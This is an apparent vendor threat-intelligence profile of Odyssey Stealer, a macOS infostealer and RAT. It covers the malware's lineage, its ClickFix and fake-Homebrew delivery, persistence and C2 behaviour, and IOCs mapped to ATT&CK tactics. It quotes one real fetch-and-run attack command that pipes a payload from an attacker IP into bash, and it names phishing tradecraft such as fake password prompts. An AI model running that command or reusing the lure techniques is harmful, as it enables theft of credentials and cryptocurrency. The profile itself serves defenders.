Odyssey Stealer
Odyssey Stealer is a macOS-focused information stealer and remote access trojan operated as a Malware-as-a-Service platform with an affiliate model. The content consistently describes it as a rebrand/evolution of Poseidon Stealer, itself forked from Atomic macOS Stealer (AMOS), with substantial shared AppleScript-based tradecraft. It targets Apple macOS systems worldwide and has been observed stealing browser credentials, cookies, autofill data, Keychain contents, Apple Notes, Telegram Desktop data, files from Desktop and Documents, and cryptocurrency wallet data. Reported wallet targeting includes more than 100 browser wallet extensions and numerous desktop wallets such as MetaMask, Phantom, Electrum, Exodus, Atomic, Ledger Live, Trezor Suite, Bitcoin Core, Monero, Wasabi, and Sparrow. Stolen data is commonly compressed into ZIP archives and exfiltrated to attacker infrastructure.
The malware is frequently delivered through social-engineering-driven macOS infection chains, especially paste-and-run / ClickFix-style lures that instruct victims to paste malicious commands into Terminal. Specific delivery themes mentioned in the content include fake Homebrew sites, fake software updates, cracked tools, fraudulent apps, fake ChatGPT desktop app pages, and other spoofed developer-tool or software portals. The content also notes earlier app-based delivery using DMGs and right-click-open Gatekeeper bypass techniques, followed by a shift toward script-based delivery after Apple patched a widely abused Gatekeeper bypass in late 2024.
Operationally, Odyssey relies heavily on AppleScript and shell scripts. Reported behaviors include displaying a fake macOS password prompt and validating the password with dscl . authonly, using the stolen password to access Keychain data, install persistence, and replace legitimate wallet applications. The malware has been described as replacing Ledger and Trezor applications with trojanized versions to intercept credentials and transactions. Persistence is established via randomized LaunchDaemon plist files using launchd, and the RAT component polls command-and-control infrastructure every 60 seconds for commands. Reported RAT capabilities include arbitrary shell execution, reinfection/repeat execution, SOCKS5 proxy enablement, and uninstall functionality. The content also states Odyssey introduced anti-sandboxing / anti-analysis behavior and botnet-style remote execution features.
The malware is associated with a centralized criminal ecosystem. Content attributes the Poseidon/Odyssey lineage to a developer known as Rodrigo4 on the Russian-language XSS forum, and cites Russian-language forum activity, Russian dashboard translations, and the build ID string "xxxblyat" as indicators of Russian-speaking operators or developers. A September 2023 advertisement described centrally hosted infrastructure priced at $3,000 per month for up to 15 affiliates, with affiliates using developer-hosted panels and C2. Researchers identified Odyssey infrastructure through its React-based admin panel and tracked 10 physical C2/MaaS hosts. Reported infrastructure and indicators include IPs 62.60.131[.]230, 62.60.131[.]250, 5.199.166[.]102, 77.90.185[.]24, 185.11.61[.]84, 217.119.139[.]117, 185.93.89[.]62, 185.93.89[.]63, 45.146.130[.]129, and 213.209.159[.]175; domains something0x[.]at, charge0x[.]at, and sdojifsfiudgigfiv[.]to; panel favicon MD5 9108dde25ad958b27f6a97d644775dee; and a shared SOCKS proxy binary SHA256 d254125912d9e9e5c271766bc4f6eea0c296ad2c0cf19d4bd57081d1bf10f044.
Additional high-confidence indicators and distinguishing traits mentioned in the content include Odyssey often using the HTTP header casing buildid and the header username, differences from Atomic in file names, URLs, and curl options, payload distribution URLs following /d/{affiliate}{campaign_id}, polling of /api/v1/bot/actions/{botid}, and exfiltration to /log. One reported fake Homebrew campaign IOC was curl -s http://185[.]93[.]89[.]62/d/vipx69930 | nohup bash &. The content also notes broad geographic targeting, with activity reported initially in the United States, France, and Spain and later across North America, Latin America, Europe, Asia, and Africa.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Odyssey, in essence, is a sophisticated variation or updated iteration of the original Poseidon, designed to operate in the post-Gatekeeper bypass era.
Techniques & procedures
29 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
1 technique
Resource Development
Initial Access
3 techniques
Initial Access
"Odyssey Stealer ... has been deployed via seemingly legitimate software updates, cracked tools, and fraudulent apps"
Execution
6 techniques
Execution
Some adversaries have used lures designed specifically for macOS users that encourage the user to open Spotlight, then macOS Terminal to execute malicious commands.
In most scenarios, once users interact with the Fix or Verify button in the lure, the button will covertly copy an obfuscated PowerShell command to the clipboard and present the user with “verification steps.”
Once the fateful paste into a Terminal window took place, the traditional AppleScript stealer code we’ve observed in previous years executed to gather data and exfiltrate.
The main payload is obfuscated AppleScript wrapped in a shell script ... do shell script command_payload
Persistence
1 technique
Persistence
Privilege Escalation
1 technique
Privilege Escalation
Stealth
4 techniques
Stealth
"Aside from continuously modifying its code structure to evade standard blocklists"
adversaries created fake websites that mimic trusted macOS dev tools like Homebrew to spread Odyssey and Atomic Stealer.
All five clusters rely on a living-off-the-land (LotL) approach, using trusted system tools already present on the operating system to carry out the attack. By routing execution through native utilities like PowerShell or the macOS Terminal, attackers effectively operate outside the reach of most standard browser-based security defenses.
Odyssey Stealer brought with it a host of enhanced capabilities designed specifically to evade detection... These new features included: Anti-sandboxing mechanisms: Tools and logic to detect and avoid execution within analysis environments like virtual machines or emulators.
Credential Access
6 techniques
Credential Access
A fake dialog tricks the user into entering their macOS password ... The password is validated against the system using dscl . authonly
On macOS, this exact trap drops Odyssey Stealer to steal sensitive data.
Browser Data (Chromium-based): Chrome, Brave, Edge, Vivaldi, Opera, OperaGX, Arc, CocCoc Cookies ... Browser Data (Gecko-based): Firefox, Waterfox cookies.sqlite
Discovery
1 technique
Discovery
Odyssey Stealer brought with it a host of enhanced capabilities designed specifically to evade detection... These new features included: Anti-sandboxing mechanisms: Tools and logic to detect and avoid execution within analysis environments like virtual machines or emulators.
Collection
3 techniques
Collection
A fake dialog tricks the user into entering their macOS password ... The password is validated against the system using dscl . authonly
Command and Control
4 techniques
Command and Control
Botnet component: Adding functionality for persistent remote execution and control, indicating a move towards more complex capabilities beyond simple, one-time data exfiltration.
supporting arbitrary shell execution, reinfection, and a SOCKS5 proxy for tunneling traffic through victim machines ... enablesocks5 Downloads and runs SOCKS5 proxy
Exfiltration
1 technique
Exfiltration
IOCs tracked for this family
73 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
24 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
An infostealer delivered via fake ChatGPT desktop app download pages in the LLMShare campaign; it targets macOS users and steals sensitive data.
Information-stealing malware observed being downloaded by the spoofed Homebrew infrastructure as part of the campaign.
Information-stealing malware deployed via ClickFix campaigns, associated with credential theft and cryptocurrency wallet data harvesting.
A malware family referenced as a secondary payload delivered through ClickFix activity.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.